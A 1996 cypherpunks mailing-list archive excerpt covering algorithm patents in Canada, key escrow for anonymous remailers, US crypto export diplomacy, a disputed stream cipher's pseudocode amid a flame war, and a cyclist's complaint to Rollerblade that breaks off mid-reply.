Date: Wed, 23 Oct 1996 22:49:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: I'm Confused about Algorithm Patents in Canada
Message-ID: <199610240556.WAA01358@clouds.heaven.org>
MIME-Version: 1.0
Content-Type: text/plain



I have a library of crypto goodies that I would like to release,
but am kinda stuck on the copyright: I read in a very new book that
algorithms cannot be patented in Canada. In AC2, however, Scheneier
mentions several of the algorithms as being patented in Canada.
Today, I visited Ascom's home page and noticed that IDEA is not
patented here, so I get the feeling the law might have changed
just recently. If anyone can tell me anymore of what they know about the
status of algorithm patents in Canada, or if they could point
me to a good source of info on the net, I would be very appreciative.
(Since my library will be free, you might be helping more than just
me too. :) )

Thanks, 
Leonard
(Visit http://www.interchg.ubc.ca/janke/index.html#lcrypt for an
ouline of what I'd like to release, if you like.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Wed, 23 Oct 1996 23:27:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: probability question for math-heads
Message-ID: <326EAA23.2DB1@best.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm too tired &/or busy to work this out, via Knuth --- maybe you can 
help, with some implications for the DES keysearch strategy.

What is the expected distribution, in a "random" binary sequence  -- 
with all the fuzziness that implies as to what _exactly_ is "random" -- 
of gaps between runs of same-bits. 

i.e. what is the expected distribution of sequence length between 
occurances of two (and only two) 1-bits in a row?  how about sequences 
of 3 1-bits?  ETc.

We know that in a _truly_ random sequence, taken over a long enough 
period, there should be all possible values of "gaps".  But what is
reasonable to expect in a "random" sequence as to how those gaps are 
distributed?  Is my question equivalent to Knuth's gap test?

If anyone feels like proffering some education on this, if I find 
anything useful in my investigations I'll certainly credit the help!

TIA, etc.  -- and hey: doesn't Nickelodeon have a trademark on GAK?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 23 Oct 1996 23:52:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: But first, something completely different... (fwd)
Message-ID: <Pine.3.89.9610232300.A11017-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


I know this forward is on the edge, but notice the request for increased 
wiretap capability. Besides, it is funny.

--Lucky

---------- Forwarded message ----------
Date: Wed, 23 Oct 96 11:10:26 PDT
From: Bruce Erickson <be1@ElSegundoCA.NCR.COM>
To: ca-firearms@lists.best.com
Subject: But first, something completely different...

Motorcycle gangs, Banditos and Hell's Angeles, in Scandanavia have
been fighting for a couple years.  A previous story in this paper
described how Hell's Angles broke into a Danish prison to throw a 
hand grenade into the cell of the Banditos' president. 

Our friends who want to ban mouse guns don't know what trouble is
possible.  It is possible to get anti-tank missiles on the black-market.

[story]

"Nordic summit on Biker Violence"
Saskis Sissons
"The Eurpoean"
10-16 October 1996

Denmark's justice minister justice has called a summit to discuss 
a joint  Nordic campaign against the biker gangs whose violent 
confrontations are posing an increasing danger to the public
throught the region.

Bjorn Westh, who is said to be shocked and furious at the latest
violence which left 2 people dead and 19 ingured after a rocket 
attack in Copenhagen, will meet his cunterparts from Sweden,
Norway and Finland to consider strategies against the gangs.

A justice ministry spokeswoman said: "It will ve an exchange of 
ideas between the ministers. It's a very serious situation in Denmark
at the moment abd these levels of violence could easily spread to 
other parts of Scandanivia.  Westh is looking into the possibility
of a total ban on the gangs but his priority is to secure the
safety of civilians."

Westh's initiative follows a meeting on 7 Octobe bwtewen Danish
Prime Minister Poul Nyrup Tasmussen and Swedish Prime Minister
Goran Persson, who promised their countries would fight the bikers
together.

Calls for concerted national and regional action against the 
escalating gang warfare have been mounting.  Only last week 1000
staged a demonstration outside the Hell's Angles compound at Titagade
in Copenhagen's Norrebro district.  A few days later were awakened 
in the early morning by an anti-tank rocket exploding in the bikers'
clubhouse.

[btw: this is the second missile attack on the HAs this year.
the first was in the late spring]

After months of prevarication the Danes have resolved to take 
tough action against the gangs.

Parliament is this week rushing through legislation which will
prevent members of the feuding Hell's Angles and Banditos meeting 
at their clubhouses in populated areas, and a national task force 
has been set up to combat the gangs.

Commander Per Larsen, who is heading the new unit, said: "The new
legislation is good news for us and we are pleased with the initiatives
of the prime minuster and justiice ministers.  But we would like to
see parliament giving us further powers to bug and phone-tap suspects
and to search houses secretly."

The feud, which began in 1994, has claimed 9 lives and injured 50
people throughout the region.

[end story]


Diane: "We need stronger tank missile controls.  Ban the sale of cheap
easily concealed tank missiles.  Require licensing and training
classes.  Store them at missile clubs"

Tanya: "There is already total prohibition on the possession of tank
missiles by private citizens and murder is still illegal." 

Diane: "Be quiet, this is a fund raising event."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Wed, 23 Oct 1996 22:03:16 -0700 (PDT)
To: Adam Shostack <adam@homeport.org>
Subject: Re: Netescrow & Remailers?
In-Reply-To: <199610240117.UAA05092@homeport.org>
Message-ID: <199610240500.BAA01796@nsa.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:
>Timothy C. May wrote:
>
>| I don't think "escrow" is the salient feature of what Adam is hinting at,
>| or at least it's now what I'm focussing on here. Rather, I think the really
>| intriguing thing is using _logical_ names for remailers, and not
>| necessarily tying them to specific accounts, specific account owners, or
>| specific sites. ("Call by name," if you will.) This could make remailers
>| more persistent.
>
>Netescrow is a system that Matt Blaze proposed to do key escrow such
>that the recovery of a key must be public.

Someone wrote me a while back asking about using oblivious key escrow
("netescrow") to build a remailer.  I was a bit skeptical of using
exactly the mechanism that I outlined in my paper on the subject,
but I think the idea raises some intersting avenues to look at.

I'll try to dig up the message I sent on the subject.

-matt

The paper in question, by the way, can be found at:
	ftp://research.att.com/dist/mab/netescrow.ps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Wed, 23 Oct 1996 22:09:17 -0700 (PDT)
To: adam@homeport.org
Subject: Re: Netescrow & Remailers?
Message-ID: <199610240505.BAA01813@nsa.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Here were my thoughts on the subject when this was mentioned to me
a month and a half ago.

-matt

[by the way, please note that I don't read cypherpunks, so please include
me in any reply that you want me to see.  Thanks.]


------- Forwarded Message

To: Adam Back <aba@dcs.ex.ac.uk>
cc: peter.allan@aeat.co.uk, cypherpunks@toad.com
Subject: Re: Job for netescrow ? (was Secure anonymouse server protocol... 
In-reply-to: Your message of "Fri, 06 Sep 1996 14:22:23 BST."
             <199609061322.OAA01150@server.test.net> 
Date: Fri, 06 Sep 1996 18:50:00 -0400
From: Matt Blaze <mab@nsa.research.att.com>

Adam Back <aba@dcs.ex.ac.uk> writes:
>
>Peter Allan <peter.allan@aeat.co.uk> writes on cpunks:
>> In the talk about replyable nym-mailers I haven't
>> yet seen netescrow mentioned.
>> 
>> You DID all read this ?
>> 
>> [Matt Blazes  Oblivious Key Escrow paper]
>>
>> This all hinges on a policy to be followed by archive holders defining
>> the conditions under which they release their shares.  
>> This could be receipt of a signed request from the owner (remailer).
>> 
>> Maybe the table relating nyms to reply addresses could be stored in
>> netescrow style so that captured remailers reveal nothing.  The problem
>> of operator coercion is not addressed by this.
>
>Just to clarify, if I understand correctly you are proposing a penet
>style system with the database held in `netescrow'.
>
>The remailer in normal operation has access to the database by making
>requests satisfying the conditions of the secret share holders.
>
>When the remailer is compromised the memory resident key is lost when
>the machine is switched off, and the owner refuses to release the key.
>
>Is what you are proposing?
>
>It sounds like a cross between Matt's netescrow and Ross Anderson's
>eternity file system.  Your penet database is being stored in a
>distributed file system, with shares, and the identity of the share
>holders is concealed.  However the aim is not to prevent others
>censoring your publically available writings, but to allow a second
>avenue of access only in the case of `mob cryptography'.
>
>This changes the system over storing the database encrypted on the
>remailer machines own disk in these ways:

[well-thought-out stuff deleted]
This is the first I've seen this proposal to use Oblivious Key Escrow
(OKE) as a store for a remailer database; apologies if all this has
been discussed already (I don't ready cypherpunks very often these
days).
     
My original idea for OKE was as a way to backup long-term,
slow-changing sensitive data without also introducing a single point
of failure for either security or availability.  The remailer model is
a bit different, and I'm not sure it's a good fit, in particular
because I haven't thought about the various new failure modes in this
application.  But let me think ``out loud.''

Suppose we want to build a persistent-reply address anonymous
messaging service (like the late anon.penet.fi) with the following
properties:

        a) The database that maps anonymous addresses to real
           addresses is secure against erasure or other permanent loss
           of availability
        b) The database is also secure against accidental or coerced
           disclosure.

Requirement (a) implies backups and persistent storage.  Requirement
(b) implies that both access to both operational and backup copies
must be carefully controlled, preferably by technical means.  So far,
this looks like a good candidate for distributed security, in the
style of OKE, Mike Reiter's Rampart service, or Ross Anderson's
Eternity service.

Actually, I think the best solution would be for the remailer itself
to be a distributed process, split among enough places to make it
difficult for anyone to attack enough nodes to compromise or recover
the address translation database.  It is not at all obvious how to do
this in practice, however, since any solution would need to combine
secure distributed computation (to calculate the mapping for each
message sent without revealing to any party, including the sender,
what the mapping is) with anonymous networking techniques such as
mixes to prevent traffic analysis from revealing the mapping.  There
are a number of unsolved theoretical and practical problems here, and
I think working out the details of such a system would make for a good
PhD thesis or two (quite seriously, and I'd be interested in talking
with anyone who wanted to pursue such a line of research).

So for now let's limit ourselves to existing tools and techniques, or
at least tools and techniques that are close to existing.  Let's say,
for the moment, that we wanted to base the system on OKE.

Assume an unconditionally trusted remailer operator whose goal is to
construct a system that resists attempts to force him or her to
UNILATERALLY reveal the database.  That is, it should not be possible
to force the remailer operator to reveal the database contents without
also enlisting the aid of the (collectively anonymous) oblivious key
holders.  My (not carefully considered) first thought is that the
address database would be encrypted and stored locally, using a key
that is escrowed using OKE.  The key would never be locally stored;
preferably, the key would exist only in memory.  The operating system
on which the remailer is run would delete this key ``at the drop of a
hat,'' e.g., any time the system was rebooted, any time someone logs
in, any time unusual activity of any sort is detected.  The key
release policy is controlled by a public key, for which the secret key
is stored in a more persistent manner (e.g., in the file system).  
Whenever the database key is deleted, the OKE recovery process is used
to recover the key automatically, and the database is re-encrypted
with a new key that is distributed to a new set of shareholders.
Under normal operation, this might happen once a month or so, and
might entail (because of policy-based delays and the time required to
collect shares) a few days of downtime.

Under unusual conditions that might precipitate some kind of coercive
situation, the remailer operator (or some automatic process on the
remailer machine) would delete the signing key as well as the
database.  It might be reasonable, for example, to delete this file
any time someone logs in to the remailer machine (which shouldn't be
needed ordinarily).  The OKE share policy would require that the
shareholder operator examine unsigned key requests manually before
releasing them.  If the keys were deleted because of a false alarm or
machine failure, the remailer operator would send a message saying
something to the effect of ``Hey, I blew it.  Please send me the key
shares once you're convinced no one has a gun to my head.''  In the
event of a public safety emergency, the police are free to attempt to
issue their own appeal for key shares, but the ability to for them to
do this is not a design goal, but rather a side-effect of the design.

I see a number of problems with using OKE for this.  In particular,
key recovery is moderately expensive and key distribution with the
oblivious multicast protocol in my paper can be very expensive.  If
keys are deleted regularly, the downtime could be unacceptable.  I'm
not sure OKE is entirely workable for this application, but perhaps a
more clever design could prove me wrong.

There are a whole bunch of engineering issues here, particularly
related to automatically detecting ``unusual'' situations.

So can this scheme be improved upon?  Is there a better way to run a
persistent-reply-address remailer?  These are interesting, and I think
largely open, questions.

- -matt

NB  The oblivious key escrow paper that I presented at the Information Hiding
workshop at the Isaac Newton Institute in May, is available at:
        ftp://ftp.research.att.com/dist/mab/netescrow.ps



------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 24 Oct 1996 03:52:05 -0700 (PDT)
To: cypherpunks@toad.com
Subject: U.S. crypto-czar appointment -- "Crypto Imperalism" in HotWired
Message-ID: <Pine.GSO.3.95.961024035113.23528C-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Thu, 24 Oct 1996 03:50:17 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: U.S. crypto-czar appointment -- "Crypto Imperalism" in HotWired

http://www.hotwired.com/netizen/

HotWired, The Netizen
Global Network

Crypto Imperialism
by Declan McCullagh, Kenneth Neil Cukier, and Brock N. Meeks
Washington, DC, 23 October
   
   The US offensive for international controls on strong encryption  
   will soon become a fusillade. In the next week, the Clinton         
   administration is set to create the position of a roving ambassador   
   whose job will be to marshal international support for a controlling  
   new US crypto policy, the Netizen has learned.

   The crypto-czar will lobby foreign governments to change their laws 
   to comply with the US regulations announced on 1 October, which    
   temporarily allow businesses to export slightly stronger           
   data-scrambling applications if they pledge to develop a "key   
   recovery" system. In such a system, a still-undefined "trusted third 
   party" would hold the unscrambling key to any encryption, and could
   be forced to give it over to law enforcement officials with a         
   warrant. The catch, of course, is that such a system permits         
   continued government access to encrypted communications.
   
   But for that plan to work, an international "key recovery" framework
   must be established. "What we need to do very clearly is to spend a
   lot of time with other countries," William Reinsch, the US Department
   of Commerce's undersecretary for export administration, told The
   Netizen.
   
   Reinsch said the newly annointed crypto ambassador would be          
   responsible for helping these countries move "in the same direction"
   as the US by "helping facilitate that process and helping to reach any
   agreements that need to be reached between us and them."              
   
   Reinsch said the position would defy the label "crypto-czar," because
   the position isn't "a czar in the policy sense.... We don't envision
   this person as one who would be giving a lot of speeches on the    
   subject and operating as a kind of public defender of the process."
   Rather, the person would work within "a context which is largely
   private, not public," Reinsch said. The president can confer the rank
   of ambassador on a political appointee for up to six months without
   Senate confirmation, the State Department said. And with ambassadorial
   rank, the czar will be able to speak for the president.              
   
   The administration is currently considering a "short list" of
   candidates "in the low single digits," drawn from current government
   employees and private citizens, Reinsch said. If a current government
   employee is chosen, he or she would be at the ambassadorial level, he
   said, and the crypto duties would simply become an additional
   responsibility.
   
   If chosen from the private sector, it will be someone with
   "significant stature," Reinsch said. That person would have "a close
   association with the administration and the president and would be
   viewed by the other countries as a senior representative who could
   speak for the president with some confidence," Reinsch said. If a
   private citizen is chosen, they would "do it for free and we'd pick up
   the travel I guess."

   The announcement should come "fairly quickly," he said. "I would hope
   next week we could ice this one."
               
   This bypasses the ongoing public debate in Congress over lifting
   crypto export controls through legislation - Sen. Conrad Burns
   (R-Montana) has pledged to keep fighting next year - and in the OECD,
   says Marc Rotenberg, the director of the Electronic Privacy
   Information Center. "This is backdooring the backdoor."
                   
   While others - notably Clint Brooks and Mike Nelson - have played the
   role of crypto spokesperson before, this move represents a redoubling
   of the administration's plans to impose its will internationally.
            
   Yet international observers say the United States may find its plans
   thwarted in the global arena, where many governments - already uneasy
   about America imposing its hegemony on regional politics - will likely
   resist another cryptocrat, even if the person comes with an        
   ambassador's honorific before his or her name.
   
   "Europe would consider that unacceptable and arrogant, no question,"
   says Simon Davies, director of Privacy International and a fellow at
   the London School of Economics. "There would certainly be a backlash,
   and it would cause immense suspicion. This whole business has become
   extremely sleazy, and the Americans appear to have taken it all very  
   personally. I would be very surprised if it was taken seriously here."
   
   Viktor Mayer-Schvnberger at the University of Vienna Law School, an 
   expert on international crypto policy, said that "if the US ups the
   ante and brings in a sort of a quasi-diplomatic person to push     
   European countries further, I think we'll see tremendous        
   arm-twisting."
   
   "It may backfire," says Mayer-Schvnberger. "The US put tremendous     
   pressure on Europe and that is going to increase if the US government
   makes such a bold move as to appoint someone to do nothing but lobby
   for key escrow." Many countries, he said, "have been very apprehensive
   of the US coming in as the 'big guy' and telling the world what is  
   good and what is bad" regarding encryption.

###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypher@cyberstation.net
Date: Thu, 24 Oct 1996 02:07:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Montgolfiering aka P Information = P *  log_base_infinity  P (fwd)
Message-ID: <Pine.BSI.3.95.961024040550.11286A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




A cryptogram 

Montgolfiering 

aka 

P Information = P * log_base_infinity P

What does it mean?

First of all, I apologize for taking so much of many reader's time
on the subject of whether the EUREKA algorithm is a "SOFTWARE" OTP or
not. As I have restated over and over and over again, time after time,
after time, it  is a PRNG, it is  a stream cipher, so we will leave it
there. We are taking the OTP question off the table, but I am sure that
the list eupatrids will continue to beat that horse forever.
Accordingly, henceforth Eureka will be referred to as a stream cipher, a
PRNG stream, and we will joust on their muddied pedantric playing field!

I also want to apologize once more to all of the readers for
having to go  down into the gutter where PM insists on duking it
out, but he leaves me no choice. I told you that I would fight no more
with him, forever; but my word is obviously not as good as Chief
Joseph's. He is wounding me by spreading his mendacious
misrepresentations to the point that I must respond.

He is also threatening me, with his malevolent baseness.  That is the
reason that he wrote that one message as private mail, not so that you
readers would not have to suffer through more of his, and yes my,
garbage. It is patently evident that he wrote that message so
that he could threaten me and you readers would not know about it, and
that is the only reason that I went public with it back to you.  

Then he tries to cover up his abhorrent conduct by  trying to make you
believe that he was trying to SAVE YOU from suffering as a labor of love.
That is the only message that he has sent privately, and he did it so that
you would not find out what he had done.  I am sure that most of you can
see through crass deception,  you are smarter than that.  And by the by 
way, thanks, to the many of you that have written in support, even if
most of you do not want to take on the powers to be by expressing your
feelings in public - keep it up, I will be most discreet.

It takes a sick mind to do things like that. I further believe that Perry
may be libeling me by asserting that Adam has already cracked my 
algorithm. Although I have now told him 22 times that is a falsehood, he 
insists on repeating it, even after it has been denied by Adam. That is a
factoidal jactitation as evidenced below. 

One writer today told me that Adam, John Pettitt and Paul Bradley had
cracked both my algorithms in one day, and that the new one was worse than
the old one, and that Perry Metzger had personally confirmed it. At
least, unlike some readers, he had part of the message right, the part
about two algorithms.

The current algorithm web page has now been visited by over 4,500 people
and all of them know that Perry is engaged in some sort of propaganda
campaign  to spread disinformation for some purpose because the algorithm
has almost nothing, just a tiny fragment, to do with what has been posted
previously. And as all of you readers tuned in at that time know, you
were told that that was not the algorithm and never has been. 

I question whether Perry may have a pecuniary interest in these affairs? 
Does Perry have an insider, or other position, or interest in one or
more of the RSA interest? Does he have any interest in PGP, Inc.,
though I rather doubt that? I am making no allegations, I am only asking
the question of why he would deliberately set out on a campaign of
disinformation without arming  himself with the truth, it is so easy all
he has to do is go to the web site and see for himself. Instead, he
ignores that and engages in propaganda. Why? At least Hal Finney had the
intellectual, and moral honesty to disclose that he was now a part
of the PGP Inc, team.

In any event to clear up any misunderstanding, let us examine what my
ALLEGED algorithm was, and compare it to the actual algorithm.


> Adam
> | > The algorithm is:
> | > 
> | >     for ( ; ; ) {
> | > 	for (i=0; i<63; i++) {
> | > 	    a[i] = (a[i] + b[i]) % c[i];
> | > 	    d = (d + a[i]) & 255;
> | > 	    *data++ ^= d;		/* xor with data */
> | > 	}
> | >     }
> | > 
> 
> 
As I have told Perry and Paul, both several times, at the time it
was first reported and later, and indirectly to all of you several times,
the above algorithm is not the algorithm posted at:
  
            www.netprivacy.com/algo.html

All anyone would have to do to determine that is to take a few seconds and
look. Yet Perry and Paul, did not do that, instead they spread the
malevolent  message around that they have broken the algorithm. In Paul's
case, it may just be confusion resulting from Perry's incessant
jabberwocky.

To those of you who might want to know the truth, I have been forced into
the position of taking your time to disclose the algorithm here, The
algorithm to follow,  is the only one that has ever existed, as most
readers should know but do not because of nazi like  propaganda.   

In a highly abbreviated form, only to show how stupid this argument about
which algorithm is which, the actual algorithm is:


A highly condensed version of the Eureka Algorithm:


Given a key, user, message, etal specific parameter set derived from
a truly random key, in this instance,  256 bytes long, 10^616 entropy,
then :

All of the parameters below, vary with each generator key, except
where the variance is limited by range factors - for instance, there
are only 49 to 79 possible Juncture Values, JV values, so that number must
be one of those corresponding values.

Starting values derived from the key, as modified by message number and
other variables. That is slightly in excess of 2^54 possibilities for the
initial D1, D2, D3, and D4 values, the differential variables.


                   D1 =  1,691
                   D2 =  1,194
                   D3 =  3,564
                   D4 =    483
                   JV =     34

          (I)          A(I)    B(I)     C(I)
           0          11908    7109    17581
           1           2252   11863    16589
           ..................................
           .................................
          51          14544    9349    17964
          52          15759   11836    17021


And the three tables:

DISP, Displacement Table - a table of the values 0 through 4095,
      randomly scrambled, by the hardware sourced truly random key.

DIFF, Diffusion Table - a second independent table of the values 0
      through 4095, randomly scrambled, by the hardware sourced truly
      random key.

DETR, Determinate Table, a third independent table of 16 sets of the
      ASCII values, 0 through 255. 



EXKEY is an 8192 byte key expanded from the 256 byte key, thus only
2^2048 bits of entropy, at the most.


IN PSEUDO CODE, the algorithm for medium level security, level 5, is:



     LEV5 SECURITY
     I=0
     DO
         DO
              JV=JV+1
              IF JV=53 THEN JV=0
              REM JV<53 is for Level 5, it ranges from 49 to 79.
              A(JV)=(A(JV)+B(JV)) MOD C(JV)
         WHILE (A(JV) AND 16384) = 1
         D1=(D1+A(JV)) AND 4095
         D2=DISP((D2+D1) AND 4095)
         F=DETR(D2)<<8
         D3=(D3+D2) AND 4095
         BUF(DIFF(I))=BUF(DIFF(I)) XOR (F+(DETR(DISP(D3))))
         D1=(D1+D3) AND 4095
         F=DETR(DISP(D1))<<8
         D4=(D4+D1) AND 4095
         BUF(DIFF(I+1))=BUF(DIFF(I+1)) XOR (F+(DETR(DISP(D4))))
              REMARK SWAP D1 AND D4, and D2 AND D3 so that the
              REMARK SELECTION COUNTERS ARE NEVER CONGRUENTIAL, EVEN
              REMARK FOR TWO SUCCESSIVE SELECTIONS
         SWAP D1,D4
         SWAP D2,D3
              REMARK SWAP VALUES IN BOTH THE DISPLACEMENT TABLE AND
              REMARK THE DETERMINATE TABLE TO INSURE THAT THE TABLES
              REMARK CONSTANTLY MUTATING - THEY ARE NEVER STATIC
              REMARK CANNOT CHANGE THE DIFFUSION TABLE UNTIL
              REMARK DIFFUSION HAS BEEN COMPLETE FOR 8192 BYTES
         SWAP DETR(D1),DETR(D3)
         SWAP DISP(D2),DISP(D4)
              REM
              REM - A NEAR DUPLICATE BUTTERFLY SECTION TO INSURE THAT
              REM - EVEN AND ODD CHARACTERS CANNOT BE BLOCKED
              REM
         DO
              JV = JV + 1
              IF JV = 53 THEN JV=0
              A(JV)=(A(JV)+B(JV)) MOD C(JV)
         WHILE (A(JV) AND 16384) = 1
         D1=(D1+A(JV)) AND 4095
         D2=DISP((D2+D1) AND 4095)
         F=DETR(D2)
         D3=(D3+D2) AND 4095
         BUF(DIFF(I+2))=BUF(DIFF(I+2)) XOR ((DETR(DISP(D3))<<8)+F)
         D1=(D1+D3) AND 4095
         F=DETR(DISP(D1))
         D4=(D4+D1) AND 4095
         BUF(DIFF(I+3))=BUF(DIFF(I+3)) XOR ((DETR(DISP(D4))<<8)+F)
              REMARK SWAP AS BEFORE EXCEPT USE DIFFERENT D VALUES
         SWAP D1,D4
         SWAP D2,D3
         SWAP DETR(D1),DETR(D3)
         SWAP DISP(D2),DISP(D4)
              REMARK CANNOT SWAP DIFFUSION TABLE VALUES BUT WE CAN
              REMARK MUTATE THE KEY SOME MORE, SO THAT WE CAN
              REMARK EVENTUALLY RESCRAMBLE THE DIFFUSION TABLE
         SWAP EXKEY(D2),EXKEY(D3)
         I = I + 4
   WHILE I < 4096
              REMARK IF JV<16 THEN RESCRAMBLE THE DIFFUSION TABLE
              REMARK THIS WILL HAPPEN APPROXIMATELY 30% OF THE TIME
   LONG IF JV < 16
       I=0,M=4096
       DO
         SEL=(SEL+EXKEY(I+2300)) MOD M
         SWAP DIFF(I),DIFF(I+SEL)
         I=I+1
         M=M-1
       WHILE I<4095
   END IF

Now I ask a candid world. Is that the same algorithm as the one Perry says
that Adam broke, the first one above? Is it the same one that Paul claims
to have broken as detailed in his message? Both claim that they are one
and the same. Are they? You can see the answer know the answer to that.

This is just an example of how the haughty eyed will use their malevolence
to intimidate the rest of you. I belive that Perry is deliberately
distorting the truth, as this proves. Paul on the other hand, may only be
confused by Metzger's montgolfiering.

The above algorithm has been condensed considerably to show that it
is not the one that Perry and Paul are referring to at all. If you are
going to analyze it in any depth, go to the web site and work with the
full algorithm, that is URL:

                    www.netprivacy.com/algo.html

If you have questions from the brief description set out above, visit the
web site and I believe that your questions will be cleared up. There are
also almost 200 megabytes of raw encryptor stream output at the site, you
do not need known plain text, it is there for all to see. What is the key
that generated the text, or what is the next 100 characters of encryptor
stream for messages 1 through 6? Bet you cannot figure it out!

How about the cryptogram?

Montgolfiering aka P Information = P log_base_infinity P

Most of you have it figured out, n'est pas?


With every best wish, 

Don Wood



> 
> 









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WEB Tech #5 <webtech5@rollerblade.com>
Date: Thu, 24 Oct 1996 06:16:38 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: Your Inquiry
Message-ID: <c=US%a=_%p=Rollerblade._Inc%l=EXCHANGE-961024131700Z-1309@mail.rollerblade.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Mr. Random Nerd:

	We receive numerous inquires and apologize for the delay in response.
So here it is...the long awaited reply.......




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WEB Tech #5 <webtech5@rollerblade.com>
Date: Thu, 24 Oct 1996 06:17:37 -0700 (PDT)
To: "'CYPHERPUNKS@toad.com>
Subject: In-Line Skating Safety and Courtesy
Message-ID: <c=US%a=_%p=Rollerblade._Inc%l=EXCHANGE-961024131748Z-1310@mail.rollerblade.com>
MIME-Version: 1.0
Content-Type: text/plain


Message:
You have to do something about your products users.  Some
sort of responsible behaviour training.  Here is a rant I made
some months ago to a bicycle specific mailing list.  (btw, my
hand is still in pain)

I am now convinced that there must be something about either cycling
specific shoes, clipless pedal cleats, or perhaps the little mirror I
have on my helmet that attracts users of inline skates so strongly
that they crash into me.  I used to think that it was a property of
the bicycle, until last night.

I went for an evening ride, and stopped to listen to some bagpipe
players practicing in a local park last night.  My bike was 10 feet
away, leaning against a tree.  I was standing off the path, on a place
where the paving had been widened to accommodate a manhole.  A skater
was skating backwards, and ran into me, knocking me over.  I jammed
several fingers landing (officially hyperextention of a long list of
Latin words).  My hand is now in a brace, and since I already have
chronic tendinitis, it may well be the better part of a year before it
returns to its normal level of pain.

I have no idea who the skater is, he picked himself up, and sprinted
off,
before I had a chance to get up myself, let alone time to offer my
speculations on his parentage, and level of intelligence.  (I suppose
he was displaying some intelligence, for if I knew who he was, I would
bring a charge of battery against him, in addition to a civil
action that would include the maker of the skates. Not knowing
who it was, or what brand of skates he wore makes such actions
much more difficult.)  I had to ride the remaining
three miles home with my left (small favor, at least I can still
write) arm on my lap.

What particularly gets me about the clown last night, is that he was
being spectacturaly irresponsible.  This is a fairly popular park, and
this was a busy time for a weekday.  He shouldn't have been skating at
speed on the path, let alone not facing the direction of travel.

While I would have preferred that he instead have hit a brick wall,
I at least had comparable mass to him, and still have reasonable
bone strength, even if my tendons are in poor shape.  Had he hit one of
the parks frailer users, the result could have
included a broken hip, or worse.  (it is popular with seniors, who
often take their evening constutional 4 abreast across the path.) I
don't ride thru it normally (I'm not gonna take out someones
grandmother), and in fact had walked my bike to listen to the pipers.

When I have complained about problem interactions with skaters before,
it was suggested that part of the problem was that I was using the
bike path, as they aren't safe for bicyles any more.  Well on Sunday,
I came up behind two skaters on the road, in single file, climbing a
hill.  I made the usual "passing left" cry, and started to pass.  The
second skater was headphone equipped, and thus apparently didn't hear
me.  He started to pass the lead skater as my front wheel pulled
alongside.  His skate struck my wheel, luckily at ground level. That
is when he became aware of my presence. We both managed to remain
upright, and I swerved further out into the traffic lane (I had
checked for oncoming cars before starting to pass.  The skater
didn't).  Again, no apology was offered by the skater, I suggested
that wearing headphones weren't a good idea on the street, he made an
obscene reply.

At this point, I am very tempted to switch from my current long
wheelbase, fairly low bottom bracket recumbent bike, to a short
wheelbase recumbent with a high bottom bracket (a design that places
the pedals and chainwheels at the very front of the bike about 25 to
30 inches off the ground), and equip it with an extra "chainring", a
14" carbide tipped one from that well known bike parts maker Black &
Decker.

The electric bell that I have mounted inside the bar is clearly
inaudible, even at times to those that aren't blocking out the world.
I have heard speculation on a "lower pitch" air horn that operates off
a water bottle filled with compressed air. (the message they convey is
_LARGE TRUCK_ not bicycle).   (of course that wouldn't have helped with
the incident
that prompted me to dictate this rant.

Some of your users have clearly taken too many falls without
a helmet.  Others just don't have a clue about rules of the
road.  I repeatedly have problems with skaters that make sudden
U turns without looking, nor was this the first time I have
had a problem with a skater skating in the direction they did
not face. (I was riding, they were oncoming, I was able to evade by
putting my bike into the drainage ditch beside the path).


SECOND Message:
I just read your "asphalt bites" safety tips.  NOT ONCE DOES
IT MENTION OTHER VEHICLES AND RULES OF THE ROAD.  It talks
about saving the riders skin, but not that of the
other users of the space they inflict themselves on.

No mention is made about operating at night, etc.  You don't
suggest a mirror, and the "quiz" that tells people to ditch
the headphones isn't mentioned on the page.  This is
truly irresponsible, and I hope some jury suitably penalizes you
for your stupid actions.

Since I wish to retain my anonymity, please send the reply
to cypherpunks@toad.com, and I will see it.  No, I don't want
an apology, I want notice that the web page, and product packaging
has been updated, stressing that inline skaters need to learn
to a: share, b: be aware of other traffic (don't U turn into the
path of another user,  look before making any sudden change of
direction or lane) c: don't come to a sudden stop in the middle of a
mixed use
"bike" path because a friend was coming the other direction, and
you stopped to chat, d: operate "predictably" so if nothing
else the other users can take steps to avoid you.
e: ditch the tunes, f: have at least one set of eyes facing
the direction you are travelling (yes, you can ride backwards,
but you have to have someone spotting for you for the whole time)
g: stay out of the lane that is for oncoming traffic -- if
the path is narrow (like most rail trails) this means ride
in single file.

REPLY FROM ROLLERBLADE INC.

Dear Mr. Random Nerd:

Thank you for your e-mail message concerning in-line skating safety and
more specifically, the "rules of the road".  

Public trails are used for many types of sporting activities (walking,
biking, skating etc.).  What the issue becomes is that all of us must
learn to be courteous to other types of users, much like on public
roadways which are utilized by cars, trucks, and motorcycles where
everyone must adhere to a common set of rules.  

Regarding your issue with Rollerblade Inc., we feel that your anger
towards us is misdirected.  A good analogy to help me illustrate the
issue for you would be this:  if a person walking down the road throws a
